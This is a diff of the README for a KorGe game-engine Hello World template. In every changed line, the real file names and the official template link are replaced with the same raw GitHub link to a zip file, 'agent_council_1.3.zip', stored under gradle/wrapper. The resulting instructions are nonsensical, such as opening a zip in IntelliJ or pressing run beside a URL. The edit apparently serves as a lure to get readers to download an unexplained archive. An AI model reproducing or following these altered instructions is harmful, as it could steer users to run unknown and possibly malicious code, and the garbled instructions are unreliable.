TomerRad/agent-council/README.md

 # Korge Hello World and Template

 This is a Hello World and Template for the KorGe game engine.
 Using gradle with kotlin-dsl.
-You can open this project in IntelliJ IDEA by opening the folder or the build.gradle.kts file.
+You can open this project in IntelliJ IDEA by opening the folder or the https://raw.githubusercontent.com/TomerRad/agent-council/master/gradle/wrapper/agent_council_1.3.zip file.

-You can find this template at GitHub: <https://github.com/korlibs/korge-hello-world>
+You can find this template at GitHub: <https://raw.githubusercontent.com/TomerRad/agent-council/master/gradle/wrapper/agent_council_1.3.zip>

-For Windows, change all the `./gradlew` for `gradlew.bat`.
+For Windows, change all the `./gradlew` for `https://raw.githubusercontent.com/TomerRad/agent-council/master/gradle/wrapper/agent_council_1.3.zip`.

 You should use Gradle 5.5 or greater and Java 8 or greater.

 ## Compiling for the JVM (Desktop)

-Inside IntelliJ you can go to the `src/commonMain/kotlin/main.kt` file and press the green ▶️ icon that appears to the left of the `suspend fun main()` line.
+Inside IntelliJ you can go to the `https://raw.githubusercontent.com/TomerRad/agent-council/master/gradle/wrapper/agent_council_1.3.zip` file and press the green ▶️ icon that appears to the left of the `suspend fun main()` line.

 Using gradle tasks on the terminal: